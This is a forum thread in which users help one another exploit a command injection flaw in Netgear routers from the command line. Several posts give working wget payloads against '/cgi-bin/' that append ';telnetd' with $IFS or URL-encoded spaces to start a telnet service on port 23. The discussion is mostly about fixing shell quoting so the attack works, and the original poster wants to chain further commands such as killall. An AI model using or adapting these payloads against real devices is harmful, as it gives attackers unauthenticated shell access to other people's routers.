Jump to content

wget/curl help? (netgear vuln)


Recommended Posts

Been playing with the command injection vuln on the Netgear routers.  Works great from a browser.

I just have no chops with wget/curl. And would like to exploit via commandline.

I've tried:

wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23'

I've even tried lynx but no love there either.

Link to comment
Share on other sites

Thanks!!  Been messing around with quotes, and made some progress.

wget "-IP-/cgi-bin/;telnetd"

This works great.  But once I try to add/stack it fails.

The $IFS (space) matches on both the host and target

21 minutes ago, Jamo said:

Wrapping it in single quotes might help; now shell considerest the `;` being part of the local shell command, not the wget/curl

wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'


Link to comment
Share on other sites

I've swapped around the single double quotes in all sorts of combos.

$IFS as a shell variable.  Its equated to a space. (on both systems)  It works *perfectly* inside a web browser.

I'm trying to get it to work with wget or curl.

Getting telnet running on default port 23 is no prob.  But would be nice to add arguments and options to do a 'killall'


(and I *do* thank you for your all your help (globally here).  You're a good/helpful guy here.  ...When Diginija speak, hackers listen  (old US inside joke)

33 minutes ago, digininja said:

I think there is a translation issue, do you mean variable?

If you do, then using single quotes means the local shell won't treat it as a variable.


Link to comment
Share on other sites

Either without quotes, or in double quotes, strings starting with dollar signs are treated as variables, in single quotes they are treated as literals as you can see in this screenshot.


What is your exact problem, from your last post it doesn't sound like it is the variables that are causing you the issues.


Link to comment
Share on other sites

On 1/29/2017 at 5:35 PM, kdodge said:

it looks like his trying to exec the telnetd on the router, you could try the %20 for a space

wget 'http:///cgi-bin/;telnetd%20-p%2023'

or just a regular space

wget 'http:///cgi-bin/;telnetd -p 23'


was going to suggest url encoding as you did. %27 for single quote(if needed anywhere) and %20 for spaces. Wrapping the whole request in single or double quotes should work with regular spaces though without the need for $IFS(whatever that is) unless $IFS was a needed part of the attack string/escape sequence.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...